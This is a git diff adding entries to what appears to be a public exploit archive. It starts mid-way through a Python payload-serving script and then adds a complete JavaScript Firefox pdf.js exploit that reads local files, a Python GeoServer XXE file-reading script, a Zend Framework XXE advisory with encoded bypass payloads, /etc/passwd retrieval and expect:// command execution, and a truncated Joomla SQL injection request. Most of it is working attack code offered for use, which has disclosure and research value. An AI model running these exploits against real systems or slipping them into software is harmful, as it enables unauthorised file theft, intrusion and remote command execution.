+    payload = tmp.read()
+  c.send('HTTP/1.1 200 OK\r\n')
+  c.send('Content-Type: application/x-x509-user-cert\r\n')
+  c.send('Content-Encoding: gzip\r\n')
+  c.send('Content-Length: {}\r\n'.format(len(payload)))
+  c.send('\r\n')
+  c.send(payload)
+
+def main():
+  print '[*] listening for connection on port {}:{}'.format(kHost, kPort)
+  s = bind_listen()
+  while True:
+    c, (host, port) = s.accept()
+    print '[*] connection from {}:{}'.format(host, port)
+    while True:
+      r = c.recv(1024)
+      if 'favicon' in r:
+        c.send('HTTP/1.1 404 Not Found\r\n\r\n')
+      else:
+        send_certificate(c, r)
+        time.sleep(20)
+        sys.exit(0)
+
+if __name__ == '__main__':
+  main()
+
+Thanks,
+Paulos Yibelo
diff --git a/platforms/multiple/local/37772.js b/platforms/multiple/local/37772.js
new file mode 100755
index 000000000..e5b45f52f
--- /dev/null
+++ b/platforms/multiple/local/37772.js
@@ -0,0 +1,245 @@
+/*
+# Exploit Title: Firefox < 39.03 pdf.js same origin policy exploit
+# Date: 13-08-2014
+# Vendor Homepage: https://www.mozilla.org/en-US/firefox/new/
+# Software Link: http://ftp.mozilla.org/pub/firefox/releases/39.0/linux-x86_64/en-US/firefox-39.0.tar.bz2
+# Version: 39.0 [Should work version before 39.0.3]
+# Tested on: Linux (Ubuntu 14.04.3 LTS) [Should probably work in OSX]
+# CVE : 2015-4495
+
+# POC code taken from https://github.com/vincd/CVE-2015-4495
+
+1. Description
+  This exploit allow attacker to read and copy information on victim's computer, once they view the web site crafted with this exploit.
+  
+2. Proof of Concept
+  Create a index.html and copy and paste the following html into it:
+        <!DOCTYPE html>
+        <html>
+            <head>
+                <title>CVE-2015-4495</title>
+            </head>
+            <body>
+                <h1>Test</h1>
+                <script type="text/javascript" src="./exploit.js" charset="utf-8"></script>
+            </body>
+        </html>
+
+    Run the index.html (Make sure the main.js is in the same directory) and we should be able to see the directory listing. 
+
+3. Solution
+  Upgrade to the latest firefox ( > 39.0.3)
+
+*/
+
+var start_timeout=2000;
+var sandbox_context_i=null;
+var DIR_CACHE={};
+var FILE_CACHE={};
+var hidden=true;
+var my_win_id=null;
+
+function start() {
+    i=document.getElementById("i");
+    i2=document.getElementById("i2");
+    if(typeof sandboxContext!=='undefined') {
+        clearInterval(intVal);
+        var os = navigator.platform;
+
+        if (os.search("Mac") > -1 || os.search("Linux") > -1) {
+            // NOTE: Replace the following root directory into any directory of your
+            // choice. Can make it an array and loop through it.
+            get_dir("/", function(data) {
+                // nothing to do here...
+            });
+        }
+    }
+}
+
+function parse_directory_listing(dir, data) {
+    var pattern = '<tbody><tr><td><a class=';
+    var start = 0;
+    var listing = 'Listing:\n';
+
+    while ((start = data.search(pattern)) >= 0) {
+        var d = data.substring(start + pattern.length + 1),
+        end = d.search('>'),
+        f = d.substring(0, end);
+        f = f.split(' ');
+        var t = f[0].substring(0, f[0].length-1);
+        var n = f[1].substring(6, f[1].length-1);
+        listing += '  [' + t + '] ' + dir + '/' + n + '\n';
+        data = d.substring(end);
+    }
+
+    // NOTE: Replace with some other useful stuff. Eg: Read the file and do a post
+    // request to send all the content to a remote server.
+    alert(listing);
+}
+
+function get_dir(dir,callback,internal) {
+    get(dir,function() {
+        data=get_data(this);
+        var dir=location.href.toString();
+        dir=dir.replace(/^file\:\/\//i,'');
+        dir=decodeURIComponent(dir);
+        parse_directory_listing(dir, data);
+    }, 500, "%target_dir%", dir);
+}
+
+function xml2string(obj) {
+    return new XMLSerializer().serializeToString(obj);
+}
+
+function _(s,template,value) {
+    s=s.toString().split(/^\s*function\s+\(\s*\)\s*\{/)[1];
+    s=s.substring(0,s.length-1);
+    if(template&&value)
+        s=s.replace(template,value);
+
+    s+=parse_directory_listing;
+    s+=__proto;
+    s+=xml2string;
+    s+=get_data;
+    s=s.replace(/\s\/\/.*\n/g,"");
+    s=s+";undefined";
+
+    return s;
+}
+
+function __proto(obj) {
+    return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
+}
+
+function get_data(obj) {
+    data=null;
+    try {
+        data=obj.document.documentElement.innerHTML;
+        if (data.indexOf('dirListing') < 0) {
+            throw new Error();
+        }
+    } catch(e) {
+        if (this.document instanceof XMLDocument) {
+            data=xml2string(this.document);
+        } else {
+            try {
+                if (this.document.body.firstChild.nodeName.toUpperCase()=='PRE') {
+                    data=this.document.body.firstChild.textContent;
+                } else {
+                    throw new Error();
+                }
+            } catch(e) {
+                try {
+                    if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') >- 1 ) {
+                        return null;
+                    } else {
+                        throw new Error();
+                    }
+                } catch(e) {
+                    ;
+                }
+            }
+        }
+    }
+    return data;
+}
+
+function get(path,callback,timeout,template,value){
+    callback = _(callback);
+    if(template && value) callback = callback.replace(template,value);
+
+    proto_prefix="file://";
+    var invisible_code="";
+    js_call1='javascript:'+invisible_code+_(function(){
+        try {
+            open("%url%","_self");
+        } catch(e) {
+            history.back();
+        } undefined;
+    }, "%url%", proto_prefix+path);
+    js_call2='javascript:' + invisible_code + ';try{updateHidden();}catch(e){};' + callback + ';undefined';
+    sandboxContext(_(function() {
+        p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+        l = p.__lookupSetter__.call(i2.contentWindow,'location');
+        l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
+    }));
+    setTimeout((function() {
+        sandboxContext(_(function() {
+            p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+            l = p.__lookupSetter__.call(i2.contentWindow,'location');
+            l.call(i2.contentWindow,window.wrappedJSObject.js_call2);
+        }));
+    }), timeout);
+}
+
+function get_sandbox_context() {
+    if(my_win_id==null) {
+        for(var i=0;i<20;i++) {
+            try {
+                if(window[i].location.toString().indexOf("view-source:")!=-1) {
+                    my_win_id=i;;break;
+                }
+            } catch(e) {}
+        }
+    };
+    if(my_win_id==null) return;
+    clearInterval(sandbox_context_i);
+    object.data='view-source:' + blobURL;
+    window[my_win_id].location='data:application/x-moz-playpreview-pdfjs;,';
+    object.data='data:text/html,<html/>';
+    window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe onload="' + _(function() {
+        window.wrappedJSObject.sandboxContext = (function(cmd) {
+            with(importFunction.constructor('return this')()) {
+                return eval(cmd);
+            }
+        });
+    }) + '"/>');
+}
+
+function setup_plugin() {
+    var i = document.createElement("iframe");
+    i.id = "i";
+    i.width = 1;
+    i.height = 1;
+    i.src = "data:application/xml,<" + "?xml version=\"1.0\"?><e><e1></e1></e>";
+    i.frameBorder = 0;
+    document.documentElement.appendChild(i);
+    i.onload=function() {
+        if(this.contentDocument.styleSheets.length>0) {
+            var i2 = document.createElement("iframe");
+            i2.id="i2";
+            i2.src="data:application/pdf,";
+            i2.frameBorder=0;
+            if(!hidden) {
+                i2.width="100%";
+                i2.height="700px";
+            } else {
+                i2.width=1;
+                i2.height=1;
+            }
+            document.documentElement.appendChild(i2);
+            pdfBlob=new Blob([''], { type:'application/pdf' });
+            blobURL = URL.createObjectURL(pdfBlob);
+            object = document.createElement('object');
+            object.data='data:application/pdf,';
+            if(hidden) {
+                object.style.display='none';
+                object.width=1;
+                object.height=1;
+            }
+            object.onload = (function() {
+                sandbox_context_i = setInterval(get_sandbox_context,200);
+                object.onload=null;
+                object.data='view-source:' + location.href;return;
+            });
+            document.documentElement.appendChild(object);
+        } else {
+            this.contentWindow.location.reload();
+        }
+    }
+}
+
+setTimeout(function() {
+    setup_plugin();
+    intVal = setInterval(start, 150);
+}, start_timeout);
\ No newline at end of file
diff --git a/platforms/multiple/webapps/37757.py b/platforms/multiple/webapps/37757.py
new file mode 100755
index 000000000..843f058ec
--- /dev/null
+++ b/platforms/multiple/webapps/37757.py
@@ -0,0 +1,66 @@
+# Exploit Title : GeoServer XXE
+# Date : 11/08/2015
+# Exploit Author : David Bloom (Script) - (Ping to Sven Claessens, Jacques Villemur and Eric Donners)
+# Vendor homepage : http://geoserver.org
+# Software Link : http://geoserver.org/release/stable
+# Version : 2.7 : <2.7.1.1  / 2.6 : <2.6.4 / 2.5 : <2.5.5.1 
+# Tested : Client Windows, Server Linux/Jetty  
+# Vendor bug track : GEOS-7032
+# CVE : No CVE
+# Category : Webapps
+# Description : An XXE vulnerability in geoserver allows to view file contents and list directories on the server.
+
+
+from xml.etree import ElementTree
+import sys
+import urllib2
+import urllib
+
+def main():
+    print '\n-----------------------\nGeoServer XXE Exploit\nScript by David Bloom\nTwitter: @philophobia78\n-----------------------\n' 
+    if len(sys.argv) != 3 :
+        print "Usage geoserver-xxe.py [URL] [File Or Dir]"
+        return
+    geoServerUrl = sys.argv[1]
+    fileName = sys.argv[2]
+
+    featuresUrl = geoServerUrl + "/wfs?request=GetCapabilities"
+    exploitUrl = geoServerUrl + "/wfs?request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@&FILTER=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%20%3C!DOCTYPE%20foo%20[%20%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F@targetFile@%22%20%3E]%3E%3CFilter%20%3E%3CPropertyIsEqualTo%3E%3CPropertyName%3E%26xxe%3B%3C%2FPropertyName%3E%3CLiteral%3EBrussels%3C%2FLiteral%3E%3C%2FPropertyIsEqualTo%3E%3C%2FFilter%3E"
+    
+    response = urllib2.urlopen(featuresUrl)
+    root = ElementTree.fromstring(response.read())
+
+    print "Searching geoserver features ... : \n"
+    gsFeatures = [] 
+    for node in root.iter():
+        if 'FeatureTypeList' in node.tag  :
+            for feature in node.iter():
+                if 'Name' in feature.tag :
+                    gsFeatures.append(feature.text)
+                    print "Feature found :" + feature.text
+    if not gsFeatures:
+        print "No geoserver feature found, wrong url ?"
+        return
+		
+    print "\nCandidate used : " + gsFeatures[0] + "\n"
+    print "Trying XXE : "
+    print "-------------\n"
+    exploitUrl = exploitUrl.replace("@candidateFeature@",gsFeatures[0])
+    exploitUrl = exploitUrl.replace("@targetFile@",fileName)
+    print exploitUrl + "\n\n"
+    try :
+        response = urllib2.urlopen(exploitUrl)
+        # Clean output from exceptions string
+        trashOutput = response.read()
+        beginRef = "Illegal property name:"
+        endRef  =  "for feature type"
+        fileStart = trashOutput.index(beginRef) + len(beginRef)
+        fileStop = trashOutput.index(endRef)
+        print "Output"
+        print "-------\n"
+        print trashOutput[fileStart:fileStop].strip()
+    except : 
+        print "An error occured, maybe a premission error"
+
+if __name__ == '__main__':
+    main()	
diff --git a/platforms/multiple/webapps/37765.txt b/platforms/multiple/webapps/37765.txt
new file mode 100755
index 000000000..06c6b88bc
--- /dev/null
+++ b/platforms/multiple/webapps/37765.txt
@@ -0,0 +1,482 @@
+=============================================
+- Release date: 12.08.2015
+- Discovered by: Dawid Golunski
+- Severity: High
+- CVE-ID: CVE-2015-5161
+=============================================
+
+ 
+I. VULNERABILITY
+-------------------------
+
+Zend Framework <= 2.4.2     XML eXternal Entity Injection (XXE) on PHP FPM
+Zend Framework <= 1.12.13
+
+ 
+II. BACKGROUND
+-------------------------
+
+- Zend Framework 
+
+From http://framework.zend.com/about/ website:
+
+"Zend Framework 2 is an open source framework for developing web applications 
+and services using PHP 5.3+. Zend Framework 2 uses 100% object-oriented code and 
+utilises most of the new features of PHP 5.3, namely namespaces, late static 
+binding, lambda functions and closures.
+
+Zend Framework 2 evolved from Zend Framework 1, a successful PHP framework with
+over 15 million downloads."
+
+
+- PHP FPM
+
+http://php.net/manual/en/install.fpm.php
+
+"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with
+ some additional features (mostly) useful for heavy-loaded sites."
+
+Starting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI 
+process manager into its codebase. However PHP-FPM was available earlier as a 
+separate project (http://php-fpm.org/).
+
+ 
+III. INTRODUCTION
+-------------------------
+
+The XML standard defines a concept of external entites. 
+XXE (XML eXternal Entity) attack is an attack on an application that parses XML 
+input from untrusted sources using incorrectly configured XML parser. 
+The application may be forced to open arbitrary files and/or network resources.
+Exploiting XXE issues on PHP applications may also lead to denial of service or
+in some cases (for example, when an 'expect' PHP module is installed) lead to 
+command execution.
+
+An independent security reserach of Zend Framework revealed that it is 
+possible to bypass XXE security controls within the framework in case 
+the PHP application using Zend XML related classes (e.g Zend_XmlRpc_Server, 
+Zend_Feed, Zend_Config_Xml etc.) from Zend Framework is served via PHP FPM.
+Bypassing the controls may allow XXE attacks and lead to the aforementioned 
+exploitation possibilities on systems where the XML parser is set to resolve 
+entities.
+
+IV. DESCRIPTION
+-------------------------
+ 
+The security controls within the Zend Framework mitigate the XXE attack vectors
+by first calling libxml_disable_entity_loader(), and then looping 
+through the DOMDocument nodes testing if any is of type: XML_DOCUMENT_TYPE_NODE
+If so, an exception is raised and PHP script execution is halted.
+
+These controls have been included in the scan() function of a Zend_Xml_Security 
+class located in the following paths depending on the code branch of Zend 
+Framework:
+
+ZendFramework-1.12.13/library/Zend/Xml/Security.php
+
+ZendFramework-2.4.2/library/ZendXml/Security.php
+
+
+In case of the latest version of ZendFramework-1.12.13, 
+the relevant code blocks from the scan() function look as follows:
+
+
+---[library/Zend/Xml/Security.php ]---
+
+    public static function scan($xml, DOMDocument $dom = null)
+    {
+        if (self::isPhpFpm()) {
+            self::heuristicScan($xml);
+        }
+
+        if (!self::isPhpFpm()) {
+            $loadEntities = libxml_disable_entity_loader(true);
+            $useInternalXmlErrors = libxml_use_internal_errors(true);
+        }
+
+        // Load XML with network access disabled (LIBXML_NONET)
+        $result = $dom->loadXml($xml, LIBXML_NONET);
+        restore_error_handler();
+
+        if (!self::isPhpFpm()) {
+            libxml_disable_entity_loader($loadEntities);
+            libxml_use_internal_errors($useInternalXmlErrors);
+        }
+
+        if (!$result) {
+            return false;
+        }
+
+        // Scan for potential XEE attacks using ENTITY, if not PHP-FPM
+        if (!self::isPhpFpm()) {
+            foreach ($dom->childNodes as $child) {
+                if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
+                    if ($child->entities->length > 0) {
+                        require_once 'Exception.php';
+                        throw new Zend_Xml_Exception(self::ENTITY_DETECT);
+                    }
+                }
+            }
+        }
+
+        if (isset($simpleXml)) {
+            $result = simplexml_import_dom($dom);
+            if (!$result instanceof SimpleXMLElement) {
+                return false;
+            }
+            return $result;
+        }
+        return $dom;
+
+
+--------------------------------------
+
+
+As we can see from the code, the application disables the entity loader
+(via libxml_disable_entity_loader), it also disables network access 
+(LIBXML_NONET), and it additionally scans provided XML for the presence of XML
+entities to prevent potential entity expansion attacks.  
+The code succesfully prevents most XXE attacks. 
+
+However, as the PHP libxml_disable_entity_loader() function was reported not
+thread safe (the entity loader setting could potentially get overwritten 
+between hits in FPM processes), Zend Framework does not use it when the 
+application is hosted in a PHP-FPM environment. Instead, another approach is 
+taken to prevent the XXE attacks.
+
+In the code above we see the check !self::isPhpFpm() which determines the type
+of interface between web server and PHP (through the php_sapi_name() function). 
+If the SAPI is FPM-CGI (i.e. PHP-FPM) the following heuristicScan function gets 
+executed: 
+
+---[library/Zend/Xml/Security.php ]---
+
+    protected static function heuristicScan($xml)
+    {
+        if (strpos($xml, '<!ENTITY') !== false) {
+            require_once 'Exception.php';
+            throw new Zend_Xml_Exception(self::ENTITY_DETECT);
+        }
+    }
+
+--------------------------------------
+
+It validates provided XML by searching for any entity declaration. It throws an
+exception if it finds one. 
+Although this check cannot be bypassed by simply adding spaces or changing 
+the characters to lower case (an XML parser would reject such declaration 
+as invalid), this security check is nevertheless insufficient. 
+
+XML format allows for different types of encoding to be used, hence it is 
+possible to bypass the check by supplying specifically encoded XML content.
+For example, a UTF-16 encoding which uses 2-byte characters would be enough to
+bypass the ENTITY string check. 
+
+Apart from the ENTITY check, the code also adds the aformentioned LIBXML_NONET
+parameter to catch entities refering to network resources. 
+This limitation can also be bypassed as shown in the proof of concept exploit. 
+
+This makes the Zend Framework vulnerable to XXE injection attacks.
+
+ 
+V. PROOF OF CONCEPT
+-------------------------
+ 
+Below is a simple PHP application using Zend Framework to implement an XML-RPC
+server for demonstation:
+
+---[ zend_xmlrpc_server.php ]--
+
+<?php
+// Simple XML-RPC SERVER
+
+	function helloworld() {
+	    $text = "Hello world! This request was executed via ".php_sapi_name().".";
+	    return $text;
+	}
+	set_include_path("./ZendFramework-1.12.13/library/");
+	require_once("./ZendFramework-1.12.13/library/Zend/Loader/Autoloader.php");
+	Zend_Loader_Autoloader::getInstance();
+
+	$server = new Zend_XmlRpc_Server();
+	$server->addFunction('helloworld');
+
+	echo $server->handle();
+?>
+
+-------------------------------
+
+This test application is hosted on an Apache server with PHP-FPM.
+
+Requesting:
+
+POST /zend_poc/zend-xmlrpc-server.php HTTP/1.1
+Host: apache-php-fpm
+
+<?xml version="1.0" encoding="UTF-8"?>
+<methodCall>
+  <methodName>helloworld</methodName>
+</methodCall>
+
+should return:
+
+<methodResponse><params><param><value><string>Hello world! 
+This request was executed via fpm-fcgi.</string></value></param></params>
+</methodResponse> 
+
+
+In order to exploit the XXE vulnerability contained in the Zend framework 
+an attacker can pass XML data containing external entities similar to:
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE methodCall [
+  <!ENTITY pocdata SYSTEM "file:///etc/passwd">
+]>
+<methodCall>
+  <methodName>retrieved: &pocdata;</methodName>
+</methodCall>
+
+
+Feeding the above data to the zend-xmlrpc-server.php script will result in
+an error:
+
+<int>631</int></value></member><member><name>faultString</name><value>
+<string>Failed to parse request</string></value></member></struct></value>
+</fault></methodResponse> 
+
+which is due to the heuristicScan ENTITy detection.
+
+We can now encode the data to avoid the check.
+
+$ cat poc-utf8.xml |  sed 's/UTF-8/UTF-16/' \ 
+	| iconv -f UTF-8 -t UTF-16 >poc-utf16.xml
+
+Hex representation of the UTF-16 encoded XML file (including the change in
+the xml header to reflect the new encoding) looks as follows:
+
+$ hexdump -C poc-utf16.xml 
+
+00000000  ff fe 3c 00 3f 00 78 00  6d 00 6c 00 20 00 76 00  |..<.?.x.m.l. .v.|
+00000010  65 00 72 00 73 00 69 00  6f 00 6e 00 3d 00 22 00  |e.r.s.i.o.n.=.".|
+00000020  31 00 2e 00 30 00 22 00  20 00 65 00 6e 00 63 00  |1...0.". .e.n.c.|
+00000030  6f 00 64 00 69 00 6e 00  67 00 3d 00 22 00 55 00  |o.d.i.n.g.=.".U.|
+00000040  54 00 46 00 2d 00 38 00  22 00 3f 00 3e 00 0a 00  |T.F.-.8.".?.>...|
+00000050  3c 00 21 00 44 00 4f 00  43 00 54 00 59 00 50 00  |<.!.D.O.C.T.Y.P.|
+00000060  45 00 20 00 6d 00 65 00  74 00 68 00 6f 00 64 00  |E. .m.e.t.h.o.d.|
+00000070  43 00 61 00 6c 00 6c 00  20 00 5b 00 0a 00 20 00  |C.a.l.l. .[... .|
+00000080  20 00 3c 00 21 00 45 00  4e 00 54 00 49 00 54 00  | .<.!.E.N.T.I.T.|
+00000090  59 00 20 00 70 00 6f 00  63 00 64 00 61 00 74 00  |Y. .p.o.c.d.a.t.|
+000000a0  61 00 20 00 53 00 59 00  53 00 54 00 45 00 4d 00  |a. .S.Y.S.T.E.M.|
+000000b0  20 00 22 00 66 00 69 00  6c 00 65 00 3a 00 2f 00  | .".f.i.l.e.:./.|
+000000c0  2f 00 2f 00 65 00 74 00  63 00 2f 00 70 00 61 00  |/./.e.t.c./.p.a.|
+000000d0  73 00 73 00 77 00 64 00  22 00 3e 00 0a 00 5d 00  |s.s.w.d.".>...].|
+000000e0  3e 00 0a 00 3c 00 6d 00  65 00 74 00 68 00 6f 00  |>...<.m.e.t.h.o.|
+000000f0  64 00 43 00 61 00 6c 00  6c 00 3e 00 0a 00 20 00  |d.C.a.l.l.>... .|
+00000100  20 00 3c 00 6d 00 65 00  74 00 68 00 6f 00 64 00  | .<.m.e.t.h.o.d.|
+00000110  4e 00 61 00 6d 00 65 00  3e 00 72 00 65 00 74 00  |N.a.m.e.>.r.e.t.|
+00000120  72 00 69 00 65 00 76 00  65 00 64 00 3a 00 20 00  |r.i.e.v.e.d.:. .|
+00000130  26 00 70 00 6f 00 63 00  64 00 61 00 74 00 61 00  |&.p.o.c.d.a.t.a.|
+00000140  3b 00 3c 00 2f 00 6d 00  65 00 74 00 68 00 6f 00  |;.<./.m.e.t.h.o.|
+00000150  64 00 4e 00 61 00 6d 00  65 00 3e 00 0a 00 3c 00  |d.N.a.m.e.>...<.|
+00000160  2f 00 6d 00 65 00 74 00  68 00 6f 00 64 00 43 00  |/.m.e.t.h.o.d.C.|
+00000170  61 00 6c 00 6c 00 3e 00  0a 00                    |a.l.l.>...|
+
+As can be seen on the hexdump, the ENTITY word is encoded using 2-byte
+characters.
+
+Resupplying the encoded data contained in poc-utf16.xml to the Zend XMLRPC 
+application, depending on the underlying libxml library, may result in a 
+password file retrival from the remote server:
+
+$ wget -q -O /dev/stdout http://apache-phpfpm/zend_poc/zend-xmlrpc-server.php \
+--post-file=poc-utf16.xml 
+
+<?xml version="1.0" encoding="UTF-8"?>
+<methodResponse><fault><value><struct><member><name>faultCode</name><value>
+<int>620</int></value></member><member><name>faultString</name><value><string>
+Method "retrieved: root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+[cut]
+" does not exist</string></value></member></struct></value></fault>
+</methodResponse> 
+
+
+If the password file is not returned, an attacker may try another version
+of an XXE attack using parameter entities and an out-of-band communication. 
+Both of these can be used to exploit the vulnerability in Zend Framework on
+a greater number of libxml configurations.
+
+Remote command execution may also be possible if the remote system has an
+'expect' php module (libexpect-php) installed. 
+If this is the case, we can for example execute 'id' command via injecting 
+the entity:
+
+<!ENTITY pocdata SYSTEM "expect://id">
+
+which should return a result similar to:
+
+<?xml version="1.0" encoding="UTF-8"?>
+<methodResponse><fault><value><struct><member><name>faultCode</name><value>
+<int>620</int></value></member><member><name>faultString</name><value>
+<string>Method "retrieved: uid=33(www-data) gid=33(www-data) 
+groups=33(www-data) " does not exist</string></value></member>
+
+
+A separate POC exploit (zend-xmlrpc-exploit-cmd-exec.sh) is included which 
+runs commands with parameters and also implements parameter entities/OOB 
+communication.
+
+
+As mentioned in the description of this vulnerability, the Zend Framework
+adds a LIBXML_NONET flag to the loadXML() call in order to prevent reaching 
+network resources through XXE.
+
+As a result, requesting a network resource such as http://192.168.57.10 via XXE 
+injection will fail.
+
+This can be bypassed by using php://filter wrapper inside an entity, e.g:
+
+<!ENTITY pocdata SYSTEM "php://filter/read=convert.base64-encode/
+resource=http://192.168.57.10">
+
+This will return a base64 encoded response from the remote server bypassing
+the LIBXML_NONET restriction:
+
+<?xml version="1.0" encoding="UTF-8"?>
+<methodResponse><fault><value><struct><member><name>faultCode</name><value><int>620</int>
+</value></member><member><name>faultString</name><value><string>Method "
+retrieved: PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDMuMiBGaW5hb
+C8vRU4iPgo8aHRtbD4KIDxoZWFkPgogIDx0aXRsZT5JbmRleCBvZiAvPC90aXRsZT4KIDwvaGVhZ
+D4KIDxib2R5Pgo8aDE+SW5kZXggb2YgLzwvaDE+CiAgPHRhYmxlPgogICA8dHI+PHRoIHZhbGlnb
+j0idG9wIj48aW1nIHNyYz0iL2ljb[cut]
+
+
+This vulnerability may also lead to Denial of Service if for example the attacker 
+requests /dev/random file through XXE. This will cause the application to block 
+on the endless input from the random generator pseudo device, until the maximum 
+execution time is reached. 
+Sending multiple requests of such kind would exhaust the maximum number of 
+threads that the web server can create.
+
+
+VI. BUSINESS IMPACT
+-------------------------
+
+An unauthenticated remote exploitation may be possible on applications which 
+make use of Zend_XmlRpc_Server with a public XML-RPC endpoint as demonstrated 
+in this advisory. 
+Authentication in case of XML-RPC is not required for exploitation
+as the XML needs to be processed first in order for the application to read 
+the credentials passed from the login data within the xml-formatted input.
+
+This issue should be marked as high/critical due to the wide deployment of Zend 
+Framework (which includes some major CMS and e-commerce applications), the 
+number of Zend XML classes affected, low complexity of exploitation, as well
+as a possibility of an unauthenticated remote exploitation. 
+There is also a growing number of servers set up to serve PHP code with PHP-FPM,
+especially in web hosting environments which need to respond to heavy load.
+ 
+VII. SYSTEMS AFFECTED
+-------------------------
+
+All systems making use of Zend Framework in versions starting from
+1.12.4 and 2.1.6 up to the latest versions of Zend Framework 1.12.13 (released
+2015-05-20) and 2.4.2 (released 2015-05-11) contain the XXE injection 
+vulnerability described in this advisory.
+
+All Zend Framework classes making use of XML and calling the vulnerable
+Zend_Xml_Security::scan() function are affected by this issue: 
+
+Zend/Amf/Parse/Amf0/Deserializer.php
+Zend/Amf/Parse/Amf3/Deserializer.php
+Zend/Config/Xml.php
+Zend/Dom/Query.php
+Zend/Feed/Abstract.php
+Zend/Feed/Entry/Abstract.php
+Zend/Feed/Entry/Atom.php
+Zend/Feed.php
+Zend/Feed/Reader.php
+Zend/Feed/Writer/Renderer/Entry/Atom.php
+Zend/Gdata/App/Base.php
+Zend/Gdata/App.php
+Zend/Gdata/Gapps/ServiceException.php
+Zend/Gdata/YouTube.php
+Zend/Json.php
+Zend/Mobile/Push/Message/Mpns/Raw.php
+Zend/Rest/Client/Result.php
+Zend/Search/Lucene/Document/Docx.php
+Zend/Search/Lucene/Document/OpenXml.php
+Zend/Search/Lucene/Document/Pptx.php
+Zend/Search/Lucene/Document/Xlsx.php
+Zend/Serializer/Adapter/Wddx.php
+Zend/Service/Amazon/Ec2/Response.php
+Zend/Service/Amazon.php
+Zend/Service/Amazon/SimpleDb/Response.php
+Zend/Service/Audioscrobbler.php
+Zend/Service/Delicious.php
+Zend/Service/Ebay/Finding.php
+Zend/Service/Flickr.php
+Zend/Service/SlideShare.php
+Zend/Service/SqlAzure/Management/Client.php
+Zend/Service/Technorati.php
+Zend/Service/WindowsAzure/Diagnostics/ConfigurationInstance.php
+Zend/Service/WindowsAzure/Management/Client.php
+Zend/Service/WindowsAzure/Storage.php
+Zend/Service/Yahoo.php
+Zend/Soap/Server.php
+Zend/Soap/Wsdl.php
+Zend/XmlRpc/Request.php
+Zend/XmlRpc/Response.php
+
+The vulnerability can be exploited in applications using vulnerable version
+of the framework, where PHP code is served with PHP-FPM, and when the xml parser
+installed in the system is set up to resolves entities. 
+
+PHP-FPM can be set up on popular web servers such as Apache, or Nginx 
+on Linux/Unix, as well as Windows systems (as per the 'fpm on cygwin' setup
+guides available on the Internet).
+
+ 
+VIII. SOLUTION
+-------------------------
+
+Install the latest version of Zend Framework containing the patch for this 
+vulnerability.
+ 
+IX. REFERENCES
+-------------------------
+
+http://legalhackers.com/
+
+http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
+
+http://framework.zend.com/blog/zend-framework-2-5-0-released.html
+
+http://framework.zend.com/security/advisory/ZF2015-06
+
+http://www.securiteam.com/
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5161
+
+
+X. DISCOVERED BY
+-------------------------
+
+The vulnerability has been discovered by Dawid Golunski
+dawid (at) legalhackers (dot) com
+legalhackers.com
+ 
+XI. REVISION HISTORY
+-------------------------
+
+Aug 12th, 2015:  Final version
+ 
+XII. LEGAL NOTICES
+-------------------------
+
+The information contained within this advisory is supplied "as-is" with
+no warranties or guarantees of fitness of use or otherwise. I accept no
+responsibility for any damage caused by the use or misuse of this information.
+
diff --git a/platforms/multiple/webapps/37767.txt b/platforms/multiple/webapps/37767.txt
new file mode 100755
index 000000000..6186dfec7
--- /dev/null
+++ b/platforms/multiple/webapps/37767.txt
@@ -0,0 +1,71 @@
+# Exploit Title: Joomla Event Manager 2.1.4 - Multiple Vulnerabilities
+# Google Dork: inurl:option=com_jem
+# Date: 08-12-2015
+# Author: Martino Sani
+# Vendor Homepage: www.joomlaeventmanager.net
+# Software Link: www.joomlaeventmanager.net/download?download=50:jem-2-1-4-stable
+# Version: 2.1.4
+# CVE: -
+
+# VULNERABILITIES
+
+##1 SQL Injection
+
+  Resource: index.php?option=com_jem&view=myevents
+  Parameter: cid
+
+  Authenticated user can execute arbitrary SQL queries via SQL injection in the functionality that allows to publish/unpublish an event.
+
+### Source Code
+
+  File: sites/models/myevents.php
+
+  function publish($cid = array(), $publish = 1)
+  {
+     if (is_array($cid) && count($cid)) {
+        $cids = implode(',', $cid);
+  
+        $query = 'UPDATE #__jem_events'
+	  . ' SET published = '. (int) $publish
+	  . ' WHERE id IN ('. $cids .')'
+	  . ' AND (checked_out = 0 OR (checked_out = ' .$userid. '))';
+          
+        $this->_db->setQuery($query);
+     }
+  }
+
+### PoC
+
+  POST /joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151 HTTP/1.1
+  Host: 127.0.0.1
+  User-Agent: Mozilla/5.0
+  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+  Accept-Language: en-US,en;q=0.5
+  Accept-Encoding: gzip, deflate
+  Referer: http://127.0.0.1/joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151
+  Cookie: 55cfbe406ffe44b0159d9a943820d207=gauuoq0rqlakkltqj4dd1mpd76; jpanesliders_stat-pane=0; jpanesliders_event-sliders-10=2; d6300469df4ad94ccc019d02bc74f647=4339lu3g2tn4lhg2lvgd8ft263
+  Connection: keep-alive
+  Content-Type: application/x-www-form-urlencoded
+  Content-Length: 352
+  
